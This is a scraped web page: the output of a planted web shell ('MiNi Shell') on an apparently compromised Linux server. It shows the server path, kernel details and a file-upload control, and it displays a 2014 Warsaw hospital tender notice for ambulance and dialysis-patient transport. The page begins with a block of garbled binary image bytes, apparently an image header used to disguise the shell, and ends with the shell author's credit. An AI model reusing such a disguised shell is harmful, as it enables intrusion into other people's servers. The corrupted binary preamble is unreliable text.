JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140418/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140418/134688-N-2014.html

<p class="kh_header"><b>Warszawa: Świadczenie usług transportu sanitarnego (wraz z transportem pacjentów dializowanych na rzecz Stacji Dializ) dla Szpitala Praskiego Sp. z o.o. w Warszawie</b><br>
<b>Numer ogłoszenia: 134688 - 2014; data zamieszczenia: 18.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Praski p.w. Przemienienia Pańskiego Spółka z ograniczoną odpowiedzialnością , Al. Solidarności 67, 03-401 Warszawa, woj. mazowieckie, tel. 22 6187190, faks 22 6187190.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.praski.waw.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.praski.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług transportu sanitarnego (wraz z transportem pacjentów dializowanych na rzecz Stacji Dializ) dla Szpitala Praskiego Sp. z o.o. w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług transportu sanitarnego (świadczonego na wezwanie Zamawiającego) oraz transportu pacjentów dializowanych (zgodnie 
z harmonogramem) Stacji Dializ Szpitala Praskiego p.w. Przemienienia Pańskiego Spółki 
z ograniczoną odpowiedzialnością w Warszawie.

Zamówienie składa się z dwóch części:

Pakiet nr 1: Transport sanitarny;
Pakiet nr 2: Transport pacjentów dializowanych. 

Przedmiotem niniejszego zamówienia jest świadczenie usług określonych w 2 częściach jak niżej. 

Pakiet nr 1 Transport Sanitarny:

Usługa będzie obejmowała:

a.	przewóz pacjentów ambulansem transportowym z kierowcą i sanitariuszem w ciągu całej doby we wszystkie dni tygodnia;
b.	przewóz pacjentów ambulansem z ratownikiem medycznym lub pielęgniarką systemową z wyposażeniem zgodnym z wytycznymi NFZ dla zespołu podstawowego ratownictwa medycznego w ciągu całej doby we wszystkie dni tygodnia;
c.	przewóz pacjentów karetką S ze składem osobowym i wyposażeniem zgodnym 
z wytycznymi NFZ dla zespołu specjalistycznego ratownictwa medycznego w ciągu całej doby we wszystkie dni tygodnia;

Usługi transportu sanitarnego muszą spełniać wymogi Narodowego Funduszu Zdrowia i ustawy z dnia 15 kwietnia 2011 roku o działalności leczniczej, muszą być wykonywane specjalistycznymi środkami transportu, sprawnymi technicznie (tzn. z aktualnymi badaniami technicznymi pojazdu, dopuszczającymi do ruchu) oraz spełniającymi warunki dodatkowe dla pojazdów uprzywilejowanych określonych szczegółowo w Rozporządzenie Ministra Infrastruktury z dnia 31 grudnia 2002 roku 
w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. Nr 32, poz. 262). Zapisy w dowodach rejestracyjnych muszą jednoznacznie określać, iż są to pojazdy przeznaczone do transportu sanitarnego. Usługi muszą być również wykonywane przez osoby posiadające odpowiednie kwalifikacje (m.in. posiadające aktualne prawo jazdy odpowiedniej kategorii 
i zaświadczenie o ukończeniu kursu z zakresu pomocy doraźnej - dla kierowcy i sanitariusza).
Wykonawca, z którym zostanie podpisana umowa podlega obowiązkowi poddania się kontroli Narodowemu Funduszowi Zdrowia.
Zamawiający zastrzega sobie możliwość, aby w uzasadnionych przypadkach transportowanemu pacjentowi towarzyszył pracownik Zamawiającego (bez dodatkowych opłat).
Fakturę za wykonaną usługę Wykonawca wystawia:
a.	w przypadku pełnej odpłatności za usługę przez Wykonawcę - na Zamawiającego; 
b.	w przypadku częściowej odpłatności przez Zamawiającego - na Zamawiającego w wysokości przypadającej na Zamawiającego, w pozostałej części Wykonawca rozlicza się bezpośrednio 
z pacjentem;
c.	w przypadku pełnej odpłatności za usługę przez pacjenta - Wykonawca rozlicza się bezpośrednio z pacjentem.

Zasady odpłatności za usługę wynikają z Rozporządzenia z dnia 27 maja 2011 r. Ministra Zdrowia 
w sprawie świadczeń gwarantowanych z zakresu ambulatoryjnej opieki specjalistycznej (Dz. U. Nr 111, poz. 653)

Uwaga !
W przypadku sytuacji uniemożliwiającej osobiste wykonanie usługi, Wykonawca jest zobowiązany zapewnić przewóz przez osobę trzecią spełniającą warunki wymagane przez Zamawiającego. W takim przypadku wszelką odpowiedzialność za niewłaściwe wykonanie usługi ponosi Wykonawca zobowiązany umową zawartą z Zamawiającym.

Zamówienie obejmuje:
A.1.  	Przewóz pacjenta ambulansem transportowym z kierowcą i sanitariuszem w ciągu całej  doby we wszystkie dni tygodnia.
A.2.  	Przewóz pacjenta ambulansem z ratownikiem medycznym lub pielęgniarką systemową 
z wyposażeniem zgodnym z wytycznymi NFZ dla zespołu podstawowego ratownictwa medycznego 
w ciągu całej doby we wszystkie dni tygodnia;
A.3.	przewóz pacjenta karetką S ze składem osobowym i wyposażeniem zgodnym z wytycznymi NFZ dla zespołu specjalistycznego ratownictwa medycznego w ciągu całej doby we wszystkie dni tygodnia;

Szacunkowa liczba transportów ( w okresie 12 miesięcy):
		
A.1.  	przewóz pacjenta ambulansem transportowym z kierowcą i sanitariuszem w ciągu całej  doby we wszystkie dni tygodnia = 1500.
A.2.  	przewóz pacjenta ambulansem z ratownikiem medycznym lub pielęgniarką systemową 
z wyposażeniem zgodnym z wytycznymi NFZ dla zespołu podstawowego ratownictwa medycznego w ciągu całej doby we wszystkie dni tygodnia = 680.
A.3.	S ze składem osobowym i wyposażeniem zgodnym z wytycznymi NFZ dla zespołu specjalistycznego ratownictwa medycznego w ciągu całej doby we wszystkie dni tygodnia;  (S) = 480.

Szczegółowy opis zamówienia stanowi załącznik do niniejszej SIWZ - Formularz ofertowy  Załącznik nr 1. 

Pakiet nr 2 Transport pacjentów dializowanych:

Usługa będzie obejmowała:

a. dowożenie pacjentów do Stacji Dializ i odwożenie ich do miejsca zamieszkania 
po zakończeniu wizyty w  Stacji Dializ;
b.	obowiązek określony w lit a dotyczy również pacjentów niepełnosprawnych, w tym na wózkach inwalidzkich, a także wymagających transportu w pozycji leżącej;
c.	zobowiązanie kierowcy do pomocy przy wsiadaniu i wysiadaniu z samochodu,
a także w poruszaniu się pacjenta niepełnosprawnego na terenie Stacji Dializ i - jeśli stan pacjenta będzie tego wymagał - do  pomocy przy opuszczaniu mieszkania i powrocie do niego;
d.	przekazanie pacjenta po przywiezieniu pielęgniarce Stacji Dializ;
e.	obowiązek zachowania pełnej dyspozycyjności dla potrzeb Zleceniodawcy w czasie trwania dializ (pozostawanie w gotowości na terenie Stacji Dializ, lub stały dyżur pod telefonem);

Wymagania odnośnie pojazdów: 

a.	Wykonawca zobowiązany jest używać do realizacji zamówienia samochodów umożliwiających wygodny transport pacjentów zgodnie ze sporządzonym harmonogramem 
b.	w przypadku awarii pojazdu Wykonawca zobowiązany jest na własny koszt zapewnić transport zastępczy w sposób niezakłócający realizacji zabiegów;
c.	pojazdy wykorzystywane do transportu pacjentów muszą posiadać aktualne badanie techniczne, możliwość skutecznego ogrzewania/ochładzania całej przestrzeni pasażerskiej oraz mieć obowiązujący dla danego typu pojazdu pakiet ubezpieczeń OC i NW;
d.	dysponowanie pojazdami mogącymi zabrać jednorazowo 8 osób;
e.	powierzchnie w pojazdach łatwo zmywalne;
f.	samochody używane do transportu wymagają akceptacji zamawiającego przed przystąpieniem do realizacji zamówienia.

Sposób realizacji usług:

a.	orientacyjna liczba transportów w obie strony 1000 miesięcznie (1000 dializ, 
80 pacjentów); możliwe są przewozy tylko w jedną stronę (tzn. do Stacji Dializ, 
lub po dializie  - do miejsca zamieszkania pacjenta);
b.	transport pacjentów będzie się odbywał na podstawie harmonogramu przygotowanego przez kierownika Stacji Dializ po podpisaniu umowy. Zamawiający zastrzega sobie prawo do doraźnych zmian w harmonogramie; 
c.	usługa transportowa obejmuje dowóz pacjenta w obie strony (do Stacji Dializ i do miejsca zamieszkania). Jeżeli usługa odbędzie się w jedną stronę (do stacji lub do miejsca zamieszkania), Zamawiający zapłaci ustaloną kwotę jednostkową, jeżeli w obie strony, zamawiający zapłaci kwotę za pełny zakres usługi;  
d.	dopuszczalne jest łączenie transportu pacjentów z uwzględnieniem przedstawionego harmonogramu. W jednym pojeździe nie może być jednak przewożonych jednocześnie więcej niż 8 pacjentów;
e.	w normalnych warunkach drogowych czas transportu w jedną stronę nie może przekraczać 60 minut;
f.	Sposób przewożenia pacjenta będzie zależał od jego stanu. Zdecydowana większość chorych wymaga przewożenia w pozycji siedzącej. Niektórzy pacjenci wymagają transportu na wózku - również w pozycji siedzącej. Zdarzają się chorzy wymagający transportu w pozycji leżącej (incydentalne sytuacje). Zamawiający przedstawi charakterystykę przewożonych pacjentów w przedstawionym harmonogramie dializ pacjentów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium, na cały okres związania ofertą, 
w następującej wysokości:  

Pakiet 1: transportu medycznego sanitarnego: 10 000,00 zł
Pakiet 2: transportu pacjentów dializowanych: 9 000,00 zł

W przypadku złożenia przez Wykonawcę oferty na dwa pakiety, jest on zobowiązany wnieść opłatę w w.w. kwotach na każdy pakiet osobno. 

2.	Wadium może być wniesione :
a)	w pieniądzu na rachunek Zamawiającego w Banku Gospodarstwa Krajowego I Oddział w Warszawie, nr konta: 96 1130 1017 0020 0760 6720 0002. 
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa  w art. 6b ust.5 pkt.2  ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. (Dz. U. Nr 109, poz. 1158 ze zm.).

Wadium musi zostać wniesione przed upływem terminu składania ofert, a kopia dowodu (potwierdzona za zgodność z oryginałem przez upoważnionego przedstawiciela Wykonawcy) jego wniesienia dołączona do oferty. 
Wadium wnoszone w pieniądzu Zamawiający przechowuje na rachunku bankowym.

W przypadku, gdy Wykonawca wnosi wadium w formach określonych w pkt. 2 lit. b - e, dowód wniesienia wadium nie może być wpięty w sposób trwały do pozostałych stron oferty. Zamawiający zaleca złożenie oryginału dowodu wniesienia wadium w oddzielnej kopercie, w sposób umożliwiający Zamawiającemu jego zwrot w terminach określonych w ustawie. Kopie dowodu wniesienia wadium należy dołączyć do oferty.

3.	Zatrzymanie wadium.
	
W przypadku wniesienia wadium w formach określonych w pkt. 2 lit. b - e jw., dokumenty te muszą zawierać określenie przypadków, w których wadium zostaje zatrzymane przez Zamawiającego, tj., kiedy Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie,
b)	nie wniósł zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,

lub kiedy Wykonawca, który złożył ofertę:
d)	w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

W przypadku wniesienia wadium w formie pieniądza Zamawiający zatrzymuje wadium 
(w przypadkach określonych wyżej) wraz z należnymi odsetkami.
4.     Zwrot wadium.
	Zamawiający zwraca wadium na zasadach określonych w art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia nie spełnia, w oparciu o oświadczenia Wykonawców o spełnieniu warunków udziału w postępowaniu oraz na podstawie złożonych wraz z ofertą dokumentów żądanych przez Zamawiającego, potwierdzających spełnienie tych warunków (Rozdział VII do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca wykonał w ciągu ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie usługi:
Pakiet 1: transportu medycznego sanitarnego, o wartości minimum 300 000,00 zł każda.
Pakiet 2: transportu pacjentów dializowanych, o wartości minimum 300 000,00 zł każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia nie spełnia, w oparciu o oświadczenia Wykonawców o spełnieniu warunków udziału w postępowaniu oraz na podstawie złożonych wraz z ofertą dokumentów żądanych przez Zamawiającego, potwierdzających spełnienie tych warunków (Rozdział VII do SIWA)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia nie spełnia, w oparciu o oświadczenia Wykonawców o spełnieniu warunków udziału w postępowaniu oraz na podstawie złożonych wraz z ofertą dokumentów żądanych przez Zamawiającego, potwierdzających spełnienie tych warunków (Rozdział VII do SIWA)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia nie spełnia, w oparciu o oświadczenia Wykonawców o spełnieniu warunków udziału w postępowaniu oraz na podstawie złożonych wraz z ofertą dokumentów żądanych przez Zamawiającego, potwierdzających spełnienie tych warunków (Rozdział VII do SIWA)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin płatności - 20</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.praski.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SZPITAL PRASKI P.W. PRZEMIENIENIA PAŃSKIEGO
SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ
Al. Solidarności 67,  03-401  WARSZAWA
BUDYNEK D, POKÓJ 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2014 godzina 10:00, miejsce: SZPITAL PRASKI P.W. PRZEMIENIENIA PAŃSKIEGO
SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ
Al. Solidarności 67,  03-401  WARSZAWA
BUDYNEK D, POKÓJ 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1: Transport sanitarny;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1 Transport Sanitarny:

Usługa będzie obejmowała:

a.	przewóz pacjentów ambulansem transportowym z kierowcą i sanitariuszem w ciągu całej doby we wszystkie dni tygodnia;
b.	przewóz pacjentów ambulansem z ratownikiem medycznym lub pielęgniarką systemową z wyposażeniem zgodnym z wytycznymi NFZ dla zespołu podstawowego ratownictwa medycznego w ciągu całej doby we wszystkie dni tygodnia;
c.	przewóz pacjentów karetką S ze składem osobowym i wyposażeniem zgodnym 
z wytycznymi NFZ dla zespołu specjalistycznego ratownictwa medycznego w ciągu całej doby we wszystkie dni tygodnia;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin płatności - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2: Transport pacjentów dializowanych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa będzie obejmowała:

a. dowożenie pacjentów do Stacji Dializ i odwożenie ich do miejsca zamieszkania 
po zakończeniu wizyty w  Stacji Dializ;
b.	obowiązek określony w lit a dotyczy również pacjentów niepełnosprawnych, w tym na wózkach inwalidzkich, a także wymagających transportu w pozycji leżącej;
c.	zobowiązanie kierowcy do pomocy przy wsiadaniu i wysiadaniu z samochodu,
a także w poruszaniu się pacjenta niepełnosprawnego na terenie Stacji Dializ i - jeśli stan pacjenta będzie tego wymagał - do  pomocy przy opuszczaniu mieszkania i powrocie do niego;
d.	przekazanie pacjenta po przywiezieniu pielęgniarce Stacji Dializ;
e.	obowiązek zachowania pełnej dyspozycyjności dla potrzeb Zleceniodawcy w czasie trwania dializ (pozostawanie w gotowości na terenie Stacji Dializ, lub stały dyżur pod telefonem);.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin płatności - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com